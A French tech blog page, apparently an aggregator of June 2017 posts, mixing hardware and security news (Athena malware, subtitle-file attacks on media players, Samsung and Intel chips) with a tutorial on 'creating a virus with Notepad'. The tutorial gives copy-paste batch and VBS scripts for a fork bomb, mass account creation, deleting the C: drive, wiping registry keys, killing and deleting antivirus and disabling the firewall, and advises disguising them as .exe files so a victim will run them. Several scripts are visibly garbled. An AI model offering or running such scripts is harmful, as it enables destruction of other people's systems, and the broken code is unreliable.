Powered By Blogger

Rechercher sur ce blogue

samedi 24 juin 2017

Athena, le malware qui permet à la CIA d'espionner tous les Windows

Révélée par WikiLeaks, cette plate-forme de malwares est capable de cibler tous les PC, de Windows XP à Windows 10. Elle a été développée par une société privée pour le compte de la CIA.

jeudi 22 juin 2017

Comment créer un virus avec Notepad



Comment créer un virus dangereux avec Notepad ,pour contre-attaquer un Hacker !


 Les virus sont des logiciels malveillants qui peuvent causer beaucoup de dommages à P.C., ordinateur et ordinateur portable. Habituellement, ils se répandent grâce au partage de fichiers spécialement sur Internet. Le partage de fichiers Torrents et les pièces jointes aux courriers électroniques sont des moyens courants de propagation d'un virus.
 
Avant d'entrer dans les détails, permettez-moi d'expliquer quel est un fichier batch? Il s'agit simplement d'un fichier texte contenant des séries de commandes exécutées automatiquement, ligne par ligne, lorsque le fichier batch s'exécute. J'ai utilisé plusieurs virgules pour diviser la phrase en plusieurs parties pour faciliter la compréhension.
 
Ainsi, en utilisant Batch File, vous pouvez créer des virus extrêmement dangereux pour supprimer les fichiers Windows, formater différents lecteurs (C:, D:, E :), voler des informations, désactiver les pare-feu.
 
Maintenant, voici quelques virus de fichiers par lots, mais extrêmement dangereux. Vous devez simplement appuyer sur Ctrl + C (Copier) et Ctrl + V (Coller) dans le Bloc-notes. Ensuite, enregistrez le fichier du bloc-notes comme "anyname.bat". Assurez-vous d'utiliser '.bat' comme extension, sinon cela ne fonctionnera pas.


1. Application Bomber:-
@echo off
😡
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x
Fonction: une fois exécuté, il va commencer à ouvrir plusieurs applications à plusieurs reprises, ce qui affectera les performances du système. Vous pouvez également ajouter une application de votre choix dans le code ci-dessus.

2. Folder Flooder-

@echo off
😡
md %random%
/folder.
goto x
Fonction: une fois exécuté, il va commencer à générer des dossiers dont le nom peut être n'importe quel nombre aléatoire.

3. User Account Flooder:-

@echo off
:xnet
user %random% /add
goto x
Fonction: une fois exécuté, il va commencer à créer des comptes utilisateur Windows dont le nom peut être un nombre aléatoire.

4. Process Creator:-

%0|%0
Fonction: - Une fois exécuté, il commencera à générer un grand nombre de processus très rapidement entraînant une suspension de P.C.

5. Internet Disabler:-

echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE
Fonction: une fois exécuté, il désactive la connexion Internet d'un ordinateur en permanence.

6. O.S. Hacker:-

@Echo off
Del C: *.* |y
Fonction: - Une fois qu'il sera exécuté, il formatera le lecteur de disque C et entraînera donc la suppression de l'O.S. Vous pouvez également remplacer C par n'importe quel lecteur de votre choix.

7. Registry Deleter:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been hacked by cool hacker. Have a nice day. Enjoy!!!
GOTO MESSAGE
Fonction: - Une fois exécuté, il supprime les fichiers de registre et laisse un message. Cela peut très affecter l'ordinateur de la victime.

8. Crazy Caps Lock:-

Set wshShell
=wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Fonction: - Une fois qu'il est exécuté, il sera activé et désactivé par Caps Lock en cas d'ennui de l'utilisateur.

9. Anti Virus Disabler:-

@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:Program Filesalwils~1avast4*.*
del /Q /F C:Program FilesLavasoftAd-awa~1*.exe
del /Q /F C:Program Fileskasper~1*.exe
cls
del /Q /F C:Program Filestrojan~1*.exe
del /Q /F C:Program Filesf-prot95*.dll
del /Q /F C:Program Filestbav*.datcls
del /Q /F C:Program Filesavpersonal*.vdf
del /Q /F C:Program FilesNorton~1*.cnt
del /Q /F C:Program FilesMcafee*.*
cls
del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.*
del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.*
del /Q /F C:Program FilesNorton~1Norton~1*.*
del /Q /F C:Program FilesNorton~1*.*
cls
del /Q /F C:Program Filesavgamsr*.exe
del /Q /F C:Program Filesavgamsvr*.exe
del /Q /F C:Program Filesavgemc*.exe
cls
del /Q /F C:Program Filesavgcc*.exe
del /Q /F C:Program Filesavgupsvc*.exe
del /Q /F C:Program Filesgrisoft
del /Q /F C:Program Filesnood32krn*.exe
del /Q /F C:Program Filesnood32*.exe
cls
del /Q /F C:Program Filesnod32
del /Q /F C:Program Filesnood32
del /Q /F C:Program Fileskav*.exe
del /Q /F C:Program Fileskavmm*.exe
del /Q /F C:Program Fileskaspersky*.*
cls
del /Q /F C:Program Filesewidoctrl*.exe
del /Q /F C:Program Filesguard*.exe
del /Q /F C:Program Filesewido*.exe
cls
del /Q /F C:Program Filespavprsrv*.exe
del /Q /F C:Program Filespavprot*.exe
del /Q /F C:Program Filesavengine*.exe
cls
del /Q /F C:Program Filesapvxdwin*.exe
del /Q /F C:Program Fileswebproxy*.exe
del /Q /F C:Program Filespanda
software*.*
rem

Fonction: - Une fois exécuté, il désactivera Anti Virus du système de la victime.

L'inconvénient d'un fichier batch est que n'importe qui peut l'ouvrir avec un bloc-notes et lire la commande facilement. En outre, tout le monde peut le supprimer s'il le juge nuisible. Ainsi, pour surmonter la limitation / inconvénient, vous pouvez utiliser un outil cool nommé 'Batch to Exe Converter'. Il convertira l'extension '.bat' en extension '.exe'. Et votre fichier Batch sera converti en un fichier d'application. Vous pouvez facilement convaincre votre victime d'ouvrir le fichier.
Un message personnel à vous
C'est agréable de voir que vous avez passé par «Post Facebook Status in Future» complètement. J'espère que vous avez apprécié cet article. Cependant, si vous voulez que je livre des tutoriels et des articles de piratage plus intéressants, merci de partager mes postures. Vous pouvez utiliser le Widget de partage social fourni à la fin de chaque publication. Après tout, le partage est pris en charge !!!
Je vous remercie. Avoir une belle journée à l'avance!!!


REF.:

Samsung gravera les composants de nos smartphones en 4nm d’ici trois ans

La société coréenne vient de dévoiler une roadmap très volontariste pour les trois à quatre années à venir. L’objectif est d’introduire une nouvelle technologie pour remplacer le FinFET et d’atteindre progressivement le plancher incroyable des 4 nm.

Piratage par les sous-titres de vos lecteurs VLC, Kodi, Popcorn Time et Stremio



Faites attention! Ils peuvent vous pirater à travers des sous-titres pendant que vous regardez des films
Les sous-titres malvaillants peuvent permettre aux pirates informatiques de compromettre votre ordinateur et peut-être votre téléviseur tout en regardant des films.
Les chercheurs de sécurité de Check Point ont annoncé un nouveau vecteur d'attaque qui affecte et menace des millions d'utilisateurs à travers le monde. En créant des fichiers de sous-titres malveillants, qui sont ensuite téléchargés par le lecteur multimédia d'une victime, les pirates peuvent compromettre les appareils utilisateurs via des vulnérabilités trouvées dans les lecteurs multimédias populaires tels que VLC, Kodi, Popcorn-Time et Stremio. Environ 200 millions de lecteurs vidéo et de streamers qui exécutent actuellement les programmes vulnérables, ce qui rend cette attaque la plus répandue. Les chercheurs de sécurité de Check Point croient que des défauts de sécurité similaires existent également dans les autres lecteurs multimédias.
La vidéo suivante montre comment les victimes peuvent être piratées par des sous-titres méchants (suspects) en utilisant l'un des lecteurs multimédias affectés, où le code malveillant caché s'exécute une fois que le film est joué. Sur le côté droit de l'écran se trouve l'ordinateur de l'attaquant, qui exécute le système d'exploitation pirate, Kali Linux qui attend que l'ordinateur de la victime se connecte à son ordinateur.
Les chercheurs de Check Point ont déjà signalé les vulnérabilités aux développeurs des applications VLC, Kodi, Popcorn Time et Stremio. Les utilisateurs sont invités à mettre à jour leur logiciel de lecteur multimédia dès que possible.


REF.:

Intel Coffee Lake : une huitième génération de Core toujours en 14nm





La huitième génération de processeurs Intel Core, nom de code du Coffee Lake, sera lancée dans la deuxième moitié de 2017. Plus tôt que prévu, mais avec une gravure en 14nm.

Plus tôt ce mois-ci, Intel a levé quelques interrogations pendant une conférence dédiée aux investisseurs : la huitième génération d’Intel Core, qui répond au doux nom de Coffee Lake, prendra le relais du Kaby Lake dès le second semestre 2017. Intel aurait donc accéléré la commercialisation de sa solution, et promet une amélioration des performances d’environ 15 % par rapport à la génération précédente. Par contre, la conséquence de ce changement de feuille de route est visible : la gravure sera en 14nm. Ce sont des puces que l’on pourrait retrouver à termes sur quelques netbooks et Chromebooks haut de gamme sous Android ou Chrome OS.

Il faudra encore patienter jusqu’à 2018 pour les gravures plus fines, avec du 10nm en 2018. A priori, le 10nm sera donc réservé à Cannon Lake, une solution très attendue, surtout face à son principal concurrent : AMD.
En effet, AMD va lever les voiles sur Ryzen en mars prochain. Ryzen mettra en vedette huit cœurs et 16 threads dans sa partie haut de gamme, avec des versions à six et quatre cœurs sur le reste de la gamme. AMD pourrait se refaire une santé, avec une solution aussi puissante que l’Intel Core i7 6900K, mais avec un TDP plus faible et des prix plus bas. Le tout avec une gravure de 14nm.

Du côté des puces ARM, Qualcomm, Samsung et Apple préparent l’arrivée des premières puces gravées en 10nm. Le Qualcomm Snapdragon 835 sera d’ailleurs la première puce commercialisée avec cette finesse de gravure.

REF.: